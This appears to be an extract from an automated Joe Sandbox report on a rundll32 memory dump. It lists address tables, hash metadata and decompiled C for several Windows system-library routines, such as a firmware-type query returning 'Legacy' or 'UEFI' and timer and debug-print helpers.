                                                                                                                0x044ce72e
                                                                                                                0x044ce748
                                                                                                                0x044ce74c
                                                                                                                0x044ce754
                                                                                                                0x044ce756
                                                                                                                0x044ce75c
                                                                                                                0x044ce75c
                                                                                                                0x00000000
                                                                                                                0x044ce75c
                                                                                                                0x044ce758
                                                                                                                0x044ce758
                                                                                                                0x00000000
                                                                                                                0x044ce758
                                                                                                                0x044ce750
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044ce752
                                                                                                                0x00000000
                                                                                                                0x044ce752
                                                                                                                0x044ce730
                                                                                                                0x044ce735
                                                                                                                0x044ce73d
                                                                                                                0x044ce73f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044ce741
                                                                                                                0x044ce741
                                                                                                                0x00000000
                                                                                                                0x044ce741
                                                                                                                0x044ce739
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044ce73b
                                                                                                                0x00000000
                                                                                                                0x044ce73b
                                                                                                                0x044ce722
                                                                                                                0x044ce720
                                                                                                                0x044ce6b0
                                                                                                                0x044ce618
                                                                                                                0x00000000
                                                                                                                0x044ce618

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: `$`
                                                                                                                • API String ID: 0-197956300
                                                                                                                • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                                                                • Instruction ID: d4749151868d53a32a8249afb7df256cb30edf29ac658ddb9983d3a0c503d1cd
                                                                                                                • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                                                                • Instruction Fuzzy Hash: 55919E393043419FEB64CE65C941B2BB7E5AF84714F28892EF599CB281E774F904CB62
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 044851BE Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 77%
                                                                                                                			E044851BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x44e05f0);
				E0445D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E0441EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E044853CA(0);
						return E0445D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0444F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E04423690(1, _t117, 0x43e1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0444AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L04424620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0444AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0448500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E04449860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                                                                                                0x044851be
                                                                                                                0x044851c3
                                                                                                                0x044851c8
                                                                                                                0x044851cd
                                                                                                                0x044851d0
                                                                                                                0x044851d3
                                                                                                                0x044851d8
                                                                                                                0x044851db
                                                                                                                0x044851de
                                                                                                                0x044851e0
                                                                                                                0x044851e3
                                                                                                                0x044851e6
                                                                                                                0x044851e8
                                                                                                                0x04485342
                                                                                                                0x04485351
                                                                                                                0x04485356
                                                                                                                0x0448535a
                                                                                                                0x04485360
                                                                                                                0x04485363
                                                                                                                0x04485366
                                                                                                                0x04485369
                                                                                                                0x04485369
                                                                                                                0x0448536b
                                                                                                                0x0448536b
                                                                                                                0x04485370
                                                                                                                0x044853a3
                                                                                                                0x044853a4
                                                                                                                0x044853a6
                                                                                                                0x044853ab
                                                                                                                0x044853ab
                                                                                                                0x044853ae
                                                                                                                0x044853ae
                                                                                                                0x044853b5
                                                                                                                0x044853bf
                                                                                                                0x044853bf
                                                                                                                0x04485375
                                                                                                                0x04485396
                                                                                                                0x044853a0
                                                                                                                0x044853a0
                                                                                                                0x00000000
                                                                                                                0x04485396
                                                                                                                0x04485377
                                                                                                                0x04485379
                                                                                                                0x0448537f
                                                                                                                0x0448538c
                                                                                                                0x04485390
                                                                                                                0x00000000
                                                                                                                0x04485390
                                                                                                                0x044851ee
                                                                                                                0x044851f1
                                                                                                                0x04485301
                                                                                                                0x04485310
                                                                                                                0x04485315
                                                                                                                0x04485318
                                                                                                                0x0448531b
                                                                                                                0x04485320
                                                                                                                0x0448532e
                                                                                                                0x04485331
                                                                                                                0x00000000
                                                                                                                0x04485331
                                                                                                                0x04485328
                                                                                                                0x04485329
                                                                                                                0x00000000
                                                                                                                0x04485329
                                                                                                                0x044851fa
                                                                                                                0x04485235
                                                                                                                0x04485236
                                                                                                                0x04485239
                                                                                                                0x0448523f
                                                                                                                0x04485240
                                                                                                                0x04485241
                                                                                                                0x04485242
                                                                                                                0x04485246
                                                                                                                0x04485247
                                                                                                                0x0448524e
                                                                                                                0x04485251
                                                                                                                0x04485267
                                                                                                                0x04485269
                                                                                                                0x0448526e
                                                                                                                0x0448527d
                                                                                                                0x0448527e
                                                                                                                0x04485281
                                                                                                                0x04485282
                                                                                                                0x04485287
                                                                                                                0x04485288
                                                                                                                0x0448528a
                                                                                                                0x0448528f
                                                                                                                0x04485294
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0448529a
                                                                                                                0x0448529c
                                                                                                                0x0448529e
                                                                                                                0x0448529e
                                                                                                                0x044852a4
                                                                                                                0x044852b0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044852ba
                                                                                                                0x044852bc
                                                                                                                0x044852bc
                                                                                                                0x044852d4
                                                                                                                0x044852d9
                                                                                                                0x044852dc
                                                                                                                0x044852e1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044852e7
                                                                                                                0x044852f4
                                                                                                                0x00000000
                                                                                                                0x044852f4
                                                                                                                0x04485270
                                                                                                                0x00000000
                                                                                                                0x04485270
                                                                                                                0x044851fc
                                                                                                                0x044851fd
                                                                                                                0x04485202
                                                                                                                0x04485203
                                                                                                                0x04485205
                                                                                                                0x0448520a
                                                                                                                0x0448520f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0448521b
                                                                                                                0x04485226
                                                                                                                0x0448522b
                                                                                                                0x0448521d
                                                                                                                0x0448521d
                                                                                                                0x04485222
                                                                                                                0x04485222
                                                                                                                0x0448522d
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID: Legacy$UEFI
                                                                                                                • API String ID: 2994545307-634100481
                                                                                                                • Opcode ID: a68d0ad08203457f4171cd1ed3225a61f13862ceef4a2190300f814abcb1bae3
                                                                                                                • Instruction ID: 79bd4b482d183333097070c9d73a049bdd7a27f101252c8068f8df2d089102bc
                                                                                                                • Opcode Fuzzy Hash: a68d0ad08203457f4171cd1ed3225a61f13862ceef4a2190300f814abcb1bae3
                                                                                                                • Instruction Fuzzy Hash: AE516F71E00618AFEF25EFA9C940AAEB7F8FF44704F54442EE549EB251DA71A941CF10
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0442B944 Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 76%
                                                                                                                			E0442B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x44fd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E04427D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E044D8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E04449E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0444B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0444CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E04427D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E044D8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0444AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x44f8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x44f862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x44f8628; // 0x0
							_t116 =  *0x44f862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                                                                                                0x0442b94c
                                                                                                                0x0442b956
                                                                                                                0x0442b95c
                                                                                                                0x0442b95e
                                                                                                                0x0442b964
                                                                                                                0x0442b969
                                                                                                                0x0442b96d
                                                                                                                0x0442b96d
                                                                                                                0x0442b970
                                                                                                                0x0442b974
                                                                                                                0x0442b97a
                                                                                                                0x0442badf
                                                                                                                0x0442badf
                                                                                                                0x0442bae2
                                                                                                                0x0442bae4
                                                                                                                0x0442bae6
                                                                                                                0x0442baf0
                                                                                                                0x04472cb8
                                                                                                                0x0442baf6
                                                                                                                0x0442baf6
                                                                                                                0x0442baf6
                                                                                                                0x0442bafd
                                                                                                                0x0442bb1f
                                                                                                                0x0442bb1f
                                                                                                                0x0442baff
                                                                                                                0x0442bb00
                                                                                                                0x0442bb00
                                                                                                                0x0442bb03
                                                                                                                0x0442bb03
                                                                                                                0x0442bacb
                                                                                                                0x0442bacf
                                                                                                                0x0442bad0
                                                                                                                0x0442bad1
                                                                                                                0x0442badc
                                                                                                                0x0442badc
                                                                                                                0x0442b980
                                                                                                                0x0442b980
                                                                                                                0x0442b988
                                                                                                                0x0442b98b
                                                                                                                0x0442b98d
                                                                                                                0x0442b990
                                                                                                                0x0442b993
                                                                                                                0x0442b999
                                                                                                                0x0442b99b
                                                                                                                0x0442b9a1
                                                                                                                0x0442b9a5
                                                                                                                0x0442b9aa
                                                                                                                0x0442b9b0
                                                                                                                0x0442b9bb
                                                                                                                0x0442b9c0
                                                                                                                0x0442b9c3
                                                                                                                0x0442b9ca
                                                                                                                0x0442b9cc
                                                                                                                0x0442b9cf
                                                                                                                0x0442b9d3
                                                                                                                0x0442b9d7
                                                                                                                0x0442ba94
                                                                                                                0x0442ba94
                                                                                                                0x0442ba98
                                                                                                                0x0442baa3
                                                                                                                0x04472ccb
                                                                                                                0x0442baa9
                                                                                                                0x0442baa9
                                                                                                                0x0442baa9
                                                                                                                0x0442bab1
                                                                                                                0x04472cd5
                                                                                                                0x04472cdd
                                                                                                                0x04472cdd
                                                                                                                0x0442babb
                                                                                                                0x0442babc
                                                                                                                0x0442bac2
                                                                                                                0x0442bac3
                                                                                                                0x0442bac3
                                                                                                                0x0442bac6
                                                                                                                0x00000000
                                                                                                                0x0442b9dd
                                                                                                                0x0442b9dd
                                                                                                                0x0442b9e7
                                                                                                                0x0442b9e7
                                                                                                                0x0442b9ec
                                                                                                                0x0442b9ec
                                                                                                                0x0442b9f1
                                                                                                                0x0442b9f5
                                                                                                                0x0442b9fa
                                                                                                                0x0442ba00
                                                                                                                0x0442ba0c
                                                                                                                0x0442ba10
                                                                                                                0x0442ba10
                                                                                                                0x0442ba12
                                                                                                                0x0442ba18
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0442bb26
                                                                                                                0x0442bb26
                                                                                                                0x0442ba1e
                                                                                                                0x0442ba1e
                                                                                                                0x0442ba23
                                                                                                                0x0442ba25
                                                                                                                0x0442ba2c
                                                                                                                0x0442ba30
                                                                                                                0x0442ba35
                                                                                                                0x0442ba35
                                                                                                                0x0442ba41
                                                                                                                0x0442ba46
                                                                                                                0x0442ba4c
                                                                                                                0x0442ba50
                                                                                                                0x0442ba54
                                                                                                                0x0442ba6a
                                                                                                                0x0442ba6e
                                                                                                                0x0442ba70
                                                                                                                0x0442ba74
                                                                                                                0x0442ba78
                                                                                                                0x0442ba7a
                                                                                                                0x0442ba7c
                                                                                                                0x0442ba8e
                                                                                                                0x0442ba90
                                                                                                                0x0442ba92
                                                                                                                0x0442bb14
                                                                                                                0x0442bb14
                                                                                                                0x0442bb16
                                                                                                                0x0442bb16
                                                                                                                0x00000000
                                                                                                                0x0442ba7c
                                                                                                                0x0442bb0a
                                                                                                                0x0442bb0d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0442bb0f

                                                                                                                APIs
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0442B9A5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                • String ID:
                                                                                                                • API String ID: 885266447-0
                                                                                                                • Opcode ID: cfc961fd71d9daa749f0ac974a62b1c91b426a402033c266ee87b7ec6c9351b9
                                                                                                                • Instruction ID: 111886957ce261aed17779d048dec16f8a42c8f158af5a5f373eb08737a21d6b
                                                                                                                • Opcode Fuzzy Hash: cfc961fd71d9daa749f0ac974a62b1c91b426a402033c266ee87b7ec6c9351b9
                                                                                                                • Instruction Fuzzy Hash: 72515771A083A0DFDB20DF29C580A2BBBE5FB88604F94496FE59587345E771F844CB92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0440B171 Relevance: 1.7, APIs: 1, Instructions: 166COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 78%
                                                                                                                			E0440B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x44df7a8);
				E0445D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0445D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0444D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0444F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0445DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0444B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0444B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0444E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0444A890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                                                                                                0x0440b171
                                                                                                                0x0440b171
                                                                                                                0x0440b171
                                                                                                                0x0440b171
                                                                                                                0x0440b171
                                                                                                                0x0440b176
                                                                                                                0x0440b17b
                                                                                                                0x0440b180
                                                                                                                0x0440b186
                                                                                                                0x0440b18f
                                                                                                                0x0440b198
                                                                                                                0x0440b1a4
                                                                                                                0x0440b1aa
                                                                                                                0x04464802
                                                                                                                0x04464802
                                                                                                                0x04464805
                                                                                                                0x0446480c
                                                                                                                0x0446480e
                                                                                                                0x0440b1d1
                                                                                                                0x0440b1d3
                                                                                                                0x0440b1de
                                                                                                                0x0440b1de
